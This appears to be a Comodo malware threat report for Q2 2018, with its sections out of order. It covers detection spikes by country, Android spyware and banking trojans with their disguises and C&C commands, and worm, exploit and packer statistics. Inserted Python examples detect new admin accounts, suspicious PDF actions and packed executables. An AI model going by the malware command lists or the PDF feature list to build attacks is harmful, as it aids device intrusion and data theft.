Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Disguises of Stalker Spy (app names from the screenshot): Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption the malware deletes the original files. So we can call it "a spy with a 007 license".

Disguises of Mystery Bot: Version 1: Adobe Flash Player; Version 2: Flash Player

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:

Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - get contact details and email id
Mute - set action to mute
Mms - get MMS content
info - get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert: Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; Version 2: Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent
plmbank
aibibankandroid

The second version can block access to some websites and apps, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Disguises of Hero Rat (Version 1): CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available on the Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Disguises of CoinHive: Version 1: Netflix Hack, Instagram Hack; Version 2: TSF Launcher; Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April

4.2.2 May 2018

Chart: Android-targeted malware in May


4.2.3 June 2018

Chart: Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality

This quarter the most common Email Worm by far was Runonce

The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (also written DarkComet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
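The behavior attributed to Starter above (a new local account that is promptly added to the Administrators group) leaves a recognizable trail in the Windows Security log: event 4720 (a user account was created) followed by event 4732 (a member was added to a security-enabled local group). The following Python is an added example, not Comodo's code or anything taken from the report. It correlates the two events over a constructed, simplified one-line-per-event log format; real exported events carry these values in separate fields, so the `Subject=`, `Target=`, `Member=` and `Group=` field names used here are an assumption for the example only.

```python
"""Correlate local account creation (4720) with promotion to Administrators (4732).

Added example, not from the Comodo report. The log format below is a
constructed simplification of two Windows Security events; real events
carry the same values in separate fields.
"""
from datetime import datetime, timedelta
import re

# Constructed sample log: one event per line, ISO timestamp, event ID, key=value fields.
SAMPLE_LOG = """\
2018-06-03T08:12:05Z 4720 Subject=svc_backup Target=RemoteSvc
2018-06-03T08:12:06Z 4732 Subject=svc_backup Member=REMOTESVC Group=Administrators
2018-06-03T09:40:00Z 4720 Subject=helpdesk Target=jsmith
2018-06-03T11:00:00Z 4732 Subject=helpdesk Member=jsmith Group=Remote Desktop Users
2018-06-04T02:10:00Z 4732 Subject=admin Member=olduser Group=Administrators
"""

LINE_RE = re.compile(r"^(\S+) (\d{4}) (.*)$")
ADMIN_GROUPS = {"administrators"}          # compared case-insensitively
WINDOW = timedelta(minutes=10)             # creation-to-promotion window that is suspicious


def parse_events(text):
    """Parse the constructed log format into dicts with 'time', 'id' and the key=value fields."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        fields = {}
        # Values may contain spaces ("Remote Desktop Users"), so split only before "Key=".
        for part in re.split(r" (?=\w+=)", m.group(3)):
            key, _, value = part.partition("=")
            fields[key] = value
        events.append({"time": ts, "id": int(m.group(2)), **fields})
    return events


def find_new_admin_accounts(events, window=WINDOW):
    """Return (account, creator, seconds between creation and promotion) for each
    account added to an admin group within `window` of its own creation."""
    created = {}   # casefolded account name -> (creation time, creating subject)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            created[ev["Target"].casefold()] = (ev["time"], ev["Subject"])
        elif ev["id"] == 4732 and ev.get("Group", "").casefold() in ADMIN_GROUPS:
            # Windows account names are case-insensitive, hence casefold() on both sides.
            key = ev["Member"].casefold()
            if key in created:
                t_create, creator = created[key]
                delta = ev["time"] - t_create
                if timedelta(0) <= delta <= window:
                    alerts.append((ev["Member"], creator, int(delta.total_seconds())))
    return alerts


if __name__ == "__main__":
    for account, creator, secs in find_new_admin_accounts(parse_events(SAMPLE_LOG)):
        print(f"ALERT: {account} created by {creator} and made Administrator {secs}s later")
```

Only the first account trips the rule: `jsmith` is added to Remote Desktop Users rather than an admin group, and `olduser` has no matching creation event inside the window. Widening `WINDOW` trades fewer misses for more noise from legitimate provisioning.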

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.

5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
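Exploit documents of the kind described above rely on PDF features that ordinary documents rarely need: embedded scripts, actions that fire automatically when the file is opened, and actions that launch external programs. A first-pass triage can therefore be done on the raw bytes without a full PDF parser. The following Python is an added example, not code from the report: it scans a constructed sample PDF for those feature names, decodes the `#xx` hex escapes that the PDF syntax allows inside names (so `/J#61vaScript` is recognised as `/JavaScript`, a cheap evasion that a naive substring search would miss), and returns a simple verdict. The keyword list and the verdict rules are conventional triage heuristics, not figures from the report.

```python
"""Keyword triage of a PDF for script and auto-action features.

Added example, not from the Comodo report. Caveat: objects inside
compressed object streams are invisible to a raw-byte scan; inflate
streams first, or use a full PDF parser, before trusting a 'clean' result.
"""
import re

# PDF name tokens that exploit documents commonly depend on, with a short reason.
SUSPICIOUS = {
    b"/JavaScript": "embedded script",
    b"/JS": "embedded script",
    b"/OpenAction": "action runs when the document is opened",
    b"/AA": "additional (automatic) action",
    b"/Launch": "launches an external program",
    b"/EmbeddedFile": "embedded file",
    b"/RichMedia": "rich media (Flash) content",
}

# A PDF name starts with '/' and ends at whitespace or a delimiter character.
NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]+")
# '#xx' inside a name is a hex escape for a single byte (PDF 1.2+).
HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")

# Constructed sample: a one-page PDF whose catalog runs a JavaScript action on open.
# The name /J#61vaScript is deliberately hex-escaped to exercise normalisation.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /J#61vaScript /JS (app.alert('hi')) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample with no actions or scripts at all.
SAMPLE_CLEAN = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def normalize_name(raw):
    """Decode #xx escapes so that /J#61vaScript compares equal to /JavaScript."""
    return HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def triage_pdf(data):
    """Return {name: count} for every suspicious name found in the raw bytes."""
    hits = {}
    for m in NAME_RE.finditer(data):
        name = normalize_name(m.group(0))
        if name in SUSPICIOUS:
            key = name.decode("ascii")
            hits[key] = hits.get(key, 0) + 1
    return hits


def verdict(hits):
    """Script plus an automatic action is the classic exploit-document shape."""
    has_script = "/JavaScript" in hits or "/JS" in hits
    has_auto_action = "/OpenAction" in hits or "/AA" in hits
    if has_script and has_auto_action:
        return "high"
    if hits:
        return "review"
    return "clean"


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_PDF), ("clean", SAMPLE_CLEAN)):
        found = triage_pdf(doc)
        print(label, verdict(found), {k: SUSPICIOUS[k.encode()] for k in found})
```

The hit counts matter as much as the verdict: a single `/JS` in a form-validation PDF is routine, whereas `/OpenAction` pointing at a script, or any `/Launch`, deserves a sandbox run before the file is released to a user.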

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and it leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
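Two properties of packed executables described above are directly measurable on a suspect file: a packer often leaves identifiable section names (stock UPX uses `UPX0`/`UPX1`), and compressed or encrypted payload data has a byte entropy approaching the 8 bits per byte of random data, whereas ordinary code and resources sit well below that. The following Python is an added example and not Comodo's code: it walks the PE section table (DOS header, `e_lfanew`, COFF header, section headers) and reports both indicators. The PE-shaped sample it analyses is constructed by `build_sample_pe()` (it has an empty optional header and will not execute; it exists only to exercise the section walk), the `UPX1` payload is filled with SHA-256 output as a deterministic stand-in for compressed data, and `ENTROPY_THRESHOLD = 7.0` is a conventional heuristic value, not a figure from the report.

```python
"""Packer heuristics for a PE file: section names and per-section byte entropy.

Added example, not from the Comodo report. Parses only what is needed to reach
the section table; the sample PE is constructed and is not a runnable program.
"""
import hashlib
import math
import struct
from collections import Counter

COFF_HDR = struct.Struct("<HHIIIHH")         # IMAGE_FILE_HEADER, 20 bytes
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes
ENTROPY_THRESHOLD = 7.0                      # heuristic: bits per byte; 8.0 is uniformly random
MIN_SECTION_SIZE = 512                       # tiny sections give noisy entropy values


def shannon_entropy(data):
    """Shannon entropy in bits per byte. Plain x86 code is typically around 5 to 6.5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(data):
    """Yield (section name, raw bytes) for each section of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = COFF_HDR.unpack_from(data, e_lfanew + 4)
    num_sections, opt_hdr_size = coff[1], coff[5]
    off = e_lfanew + 4 + COFF_HDR.size + opt_hdr_size
    for _ in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr, *_ = SECTION_HDR.unpack_from(data, off)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        yield name, data[raw_ptr:raw_ptr + raw_size]
        off += SECTION_HDR.size


def packer_indicators(data):
    """Return human-readable indicators; an empty list means nothing was found."""
    indicators = []
    for name, raw in pe_sections(data):
        if name.upper().startswith("UPX"):
            indicators.append(f"section {name}: UPX section name")
        ent = shannon_entropy(raw)
        if len(raw) >= MIN_SECTION_SIZE and ent >= ENTROPY_THRESHOLD:
            indicators.append(f"section {name}: entropy {ent:.2f}")
    return indicators


def build_sample_pe(sections):
    """Construct a minimal PE-shaped byte string from [(name, raw_bytes), ...].
    The optional header is omitted (size 0), so this is a parsing fixture only."""
    e_lfanew = 0x40
    hdr_size = e_lfanew + 4 + COFF_HDR.size + SECTION_HDR.size * len(sections)
    raw_ptr = (hdr_size + 0x1FF) & ~0x1FF        # align section data to 512 bytes
    headers = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", headers, 0x3C, e_lfanew)
    headers += b"PE\0\0" + COFF_HDR.pack(0x14C, len(sections), 0, 0, 0, 0, 0x102)
    body = bytearray()
    for name, raw in sections:
        headers += SECTION_HDR.pack(name.ljust(8, b"\0"), len(raw), 0x1000, len(raw),
                                    raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += raw
    return bytes(headers).ljust(raw_ptr, b"\0") + bytes(body)


def sample_indicators():
    """Analyse one constructed 'packed' and one constructed 'unpacked' sample."""
    # Deterministic high-entropy filler standing in for a compressed payload (4096 bytes).
    compressed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
    # Low-entropy filler standing in for ordinary code or resources.
    plain = b"MOV EAX, 1 ; constructed low-entropy 'code'\n" * 100
    packed = build_sample_pe([(b"UPX0", b""), (b"UPX1", compressed), (b".rsrc", plain)])
    unpacked = build_sample_pe([(b".text", plain), (b".data", b"\0" * 1024)])
    return packer_indicators(packed), packer_indicators(unpacked)


if __name__ == "__main__":
    for label, found in zip(("packed", "unpacked"), sample_indicators()):
        print(label, found or ["no packer indicators"])
```

The name check alone is weak evidence, since section names are trivially renamed (the "M" in MUPX is exactly that kind of modification), which is why the entropy check runs on every section regardless of its name; a large, near-random section in a file that is not otherwise encrypted or compressed is the signal that survives renaming.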

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact they are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but it now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

